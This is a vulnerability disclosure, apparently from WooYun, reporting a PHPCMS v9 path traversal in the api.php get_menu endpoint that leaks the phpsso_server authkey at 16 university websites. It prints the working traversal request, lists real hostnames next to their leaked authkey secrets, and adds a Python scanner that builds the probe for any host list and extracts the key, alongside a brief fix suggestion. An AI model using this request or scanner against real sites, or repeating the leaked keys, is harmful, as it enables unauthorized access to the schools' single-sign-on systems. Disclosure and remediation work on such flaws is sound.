
Vulnerability summary

Defect ID: wooyun-2015-0128335

Title: Sensitive information disclosure at 16 universities (batch report)

Vendor: CCERT教育网应急响应组 (CCERT Education Network Emergency Response Team)

Author: blaz

Submitted: 2015-07-22 17:14

Fixed: 2015-07-27 17:16

Published: 2015-07-27 17:16

Vulnerability type: sensitive information disclosure

Severity: medium

Self-assessed rank: 10

Status: handed to a third-party partner organization (CCERT Education Network Emergency Response Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-22: details sent to the vendor, awaiting vendor handling
2015-07-27: vendor has ignored the vulnerability; details disclosed to the public

Brief description:

Sensitive information disclosure at 16 universities

Detailed description:

Every host below exposes the same api.php get_menu endpoint; phpsso_server is the single-sign-on component that ships with PHPCMS v9. The cachefile parameter accepts a traversal path, so pointing it at the SSO applist cache file and requesting key=authkey makes the endpoint return the authkey field of that cache inside the JSONP callback named by callback=aaaaa. The authkey is the shared secret that authenticates the site's requests to phpsso_server, which is why the finding is classed as sensitive information disclosure. Request against the first host:

http://wzb.bnu.edu.cn//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin

Response:

aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"])

The identical query string against each of the following hosts returns the authkey shown:

wzb.bnu.edu.cn           h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X
xcb.ytu.edu.cn           8Uh9SlA7TsbITlkbn0PTCBEgGu2YKExC
rsgis.whu.edu.cn         Dz99Zl9DzvZgazpknlDrplNzfaefQMzc
www.ykuc.edu.cn          7OoWDH7UfC24hII8F2pPb01U7Q7OxSay
sfl.swjtu.edu.cn         zfQgF9q94PPw7PLqAsPLuHb0Qw9PGuM2
mec.xjtu.edu.cn          xhmU2v8QCvBgvf8VIfRvYKtneBnyb6Za
jwc.shsmu.edu.cn         MQgwGUdYCZeNHsMb4HShP0hF5gQpSgto
cj.dhu.edu.cn            Hlra5Dsc8VwN8ggbgppFVrkyXgI9Y5gi
gr.xupt.edu.cn           GO96qk2bSlbK6xE1bMmQXRrXuO1I0zFS
software.hebtu.edu.cn    hF5B9BbCByB2c1RyRk1AI9D5MSuPVYk7
kj.swufe.edu.cn          sg4w8IRFeCg0r6hWlB2SQGw6SgSi8C9t
oursim.whu.edu.cn        PndaqkaRH6Pe2G7nkPnxSUSLGafw9Gno
www.lib.sjtu.edu.cn      cmqwkeX4D9RELpW82oCMCclBsdzyVGg5
gibs.gcu.edu.cn          aZHD4GxRf2aOrbZ4ehaaXK2vxMD2G0kb
hqglc.usx.edu.cn         29aVM9gsH7YsqQFT80v0lC75vVBQFHEI

Proof of vulnerability:

The requests and responses are identical to those listed in the detailed description above.

Fix:

Upgrade to the latest version. Because the authkey has already been disclosed, it must also be regenerated on each affected site and its phpsso_server; patching alone does not invalidate a leaked key.
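The probe the report describes, and the input check that would have stopped it, as an added example (this is not code from the report, from blaz, or from PHPCMS). It builds the same api.php query string, parses the JSONP reply into the leaked value, and runs a scan over a list of hosts with an injectable fetch function so it works offline; the hostnames vuln.example.edu and fixed.example.edu and their responses are constructed, and is_safe_cachefile is an illustrative server-side check, not the vendor's actual patch.

```python
import json
import re
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import quote

# Query string taken from the report: the cachefile value walks out of the
# web-side cache directory into the phpsso_server cache, and key=authkey
# asks for the authkey field of that cache file.
CACHEFILE = r"..\..\..\phpsso_server\caches\caches_admin\caches_data\applist"
CALLBACK = "aaaaa"


def build_probe_url(host: str, callback: str = CALLBACK) -> str:
    """Build the same request the report issues, with the path URL-encoded."""
    query = (
        "op=get_menu&act=ajax_getlist&callback=%s&parentid=0&key=authkey"
        "&cachefile=%s&path=admin" % (callback, quote(CACHEFILE, safe=""))
    )
    return "http://%s/api.php?%s" % (host, query)


def parse_jsonp_authkey(body: str, callback: str = CALLBACK) -> Optional[str]:
    """Extract the authkey from a reply such as
    aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"]); return None when the
    body is not our JSONP callback or carries no key (patched host, 404, ...)."""
    match = re.match(r"^\s*" + re.escape(callback) + r"\((.*)\)\s*;?\s*$", body, re.S)
    if not match:
        return None
    try:
        payload = json.loads(match.group(1))
    except ValueError:
        return None
    if not (isinstance(payload, list) and payload and isinstance(payload[0], str)):
        return None
    # The leaked value is the only non-empty comma-separated field.
    fields = [f for f in payload[0].split(",") if f]
    return fields[0] if fields else None


def scan(hosts: Iterable[str], fetch: Callable[[str], str]) -> Dict[str, Optional[str]]:
    """Probe each host; fetch(url) -> body is injected so the scan runs offline."""
    results: Dict[str, Optional[str]] = {}
    for host in hosts:
        try:
            body = fetch(build_probe_url(host))
        except Exception:  # connection error or timeout: no evidence either way
            results[host] = None
            continue
        results[host] = parse_jsonp_authkey(body)
    return results


# Server-side fix sketch (an assumption for illustration, not PHPCMS's patch):
# a cache name must be a bare identifier, so neither "../" nor "..\" style
# traversal can reach a file outside the intended cache directory.
SAFE_CACHEFILE = re.compile(r"^[A-Za-z0-9_]+$")


def is_safe_cachefile(name: str) -> bool:
    return bool(SAFE_CACHEFILE.match(name))


def demo_fetch(url: str) -> str:
    """Constructed responses for an offline run: one hypothetical host leaks
    the key quoted in the report, the other answers with an empty cache."""
    if url.startswith("http://vuln.example.edu/"):
        return 'aaaaa([",h7s5vEA4gG5u5KKGxlCtDg2zGR9Vyg7X,,,"])'
    return "aaaaa([])"


if __name__ == "__main__":
    for host, key in scan(["vuln.example.edu", "fixed.example.edu"], demo_fetch).items():
        print("%-20s %s" % (host, "LEAKS authkey " + key if key else "no leak"))
    print("is_safe_cachefile(applist):", is_safe_cachefile("applist"))
    print("is_safe_cachefile(payload):", is_safe_cachefile(CACHEFILE))
```

To run it against real hosts, pass a fetch function built on urllib or requests with a short timeout; the parser deliberately returns None for anything that is not the expected callback, so an HTML error page or an empty cache is never mistaken for a leak.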

Copyright notice: when reposting, credit the source as blaz@乌云 (blaz@WooYun)


Vulnerability response

Vendor response:

Severity: no impact (ignored by vendor)

Ignored at: 2015-07-27 17:16

Vendor reply:

Latest status:

None